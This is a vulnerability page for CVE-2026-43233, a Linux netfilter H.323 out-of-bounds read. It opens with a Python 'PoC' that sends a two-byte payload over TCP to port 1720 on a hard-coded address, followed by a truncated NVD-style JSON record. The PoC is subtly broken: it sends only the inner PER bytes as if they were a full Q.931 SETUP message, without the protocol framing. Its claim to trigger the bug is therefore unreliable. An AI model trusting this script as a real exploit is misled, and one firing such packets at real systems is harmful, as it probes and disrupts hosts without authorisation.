CVE-2026-43233

import socket # PoC for CVE-2026-43233 # Sends a crafted Q.931 SETUP message to port 1720 def send_exploit(target_ip, target_port=1720): # Crafted User-User Information Element with PER-encoded data {0x08, 0x00} # This is a simplified representation of a Q.931 SETUP message payload = bytes([0x08, 0x00]) try: print(f"Sending payload to {target_ip}:{target_port}") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) s.send(payload) s.close() print("Payload sent successfully.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Replace with the target IP address target = "192.168.1.1" send_exploit(target)

{"cve": {"id": "CVE-2026-43233", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:43.417", "lastModified": "2026-05-12T19:03:56.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_h323: fix OOB read in decode_choice()\n\nIn decode_choice(), the boundary check before get_len() uses the\nvariable `len`, which is still 0 from its initialization at the top of\nthe function:\n\n unsigned int type, ext, len = 0;\n ...\n if (ext || (son->attr & OPEN)) {\n BYTE_ALIGN(bs);\n if (nf_h323_error_boundary(bs, len, 0)) /* len is 0 here */\n return H323_ERROR_BOUND;\n len = get_len(bs); /* OOB read */\n\nWhen the bitstream is exactly consumed (bs->cur == bs->end), the check\nnf_h323_error_boundary(bs, 0, 0) evaluates to (bs->cur + 0 > bs->end),\nwhich is false. The subsequent get_len() call then dereferences\n*bs->cur++, reading 1 byte past the end of the buffer. If that byte\nhas bit 7 set, get_len() reads a second byte as well.\n\nThis can be triggered remotely by sending a crafted Q.931 SETUP message\nwith a User-User Information Element containing exactly 2 bytes of\nPER-encoded data ({0x08, 0x00}) to port 1720 through a firewall with\nthe nf_conntrack_h323 helper active. The decoder fully consumes the\nPER buffer before reaching this code path, resulting in a 1-2 byte\nheap-buffer-overflow read confirmed by AddressSanitizer.\n\nFix this by checking for 2 bytes (the maximum that get_len() may read)\ninstead of the uninitialized `len`. This matches the pattern used at\nevery other get_len() call site in the same file, where the caller\nchecks for 2 bytes of available data before calling get_len()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.1", "versionEndExcluding": "5.10.252", "matchCriteriaId": "AF06F1E5-CD8A-4600-A5A6-AC36110965FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:-:*:*:*:*:*:*", "matchCriteriaId": "3B4D39AF-668B-442B-8085-639A6D4FA5AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc4:*:*:*:*:*:*", "matchCriteriaId": "EBC4657A-0239-47DF-B582-87D8DFA69439"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc5:*:*:*:*:*:*", "matchCriteriaId": "0E1F48A9-9185-4554-9265-22CEC01D18FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc6:*:*:*:*:*:*", "matchCriteriaId": "639D2465-65E0-40E2-B7A8-BEA9E221DE54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc7:*:*:*:*:*:*", "matchCriteriaId": "A282AD0B-2D63-4F05-8F89-109A0975B423"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc8:*:*:*:*:*:*", "matchCriteriaId": "30358221-183C-4699-994E-AF51F5D534FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:4.15:rc9:*:*:*:*:*:*", "matchCriteriaI ... (truncated)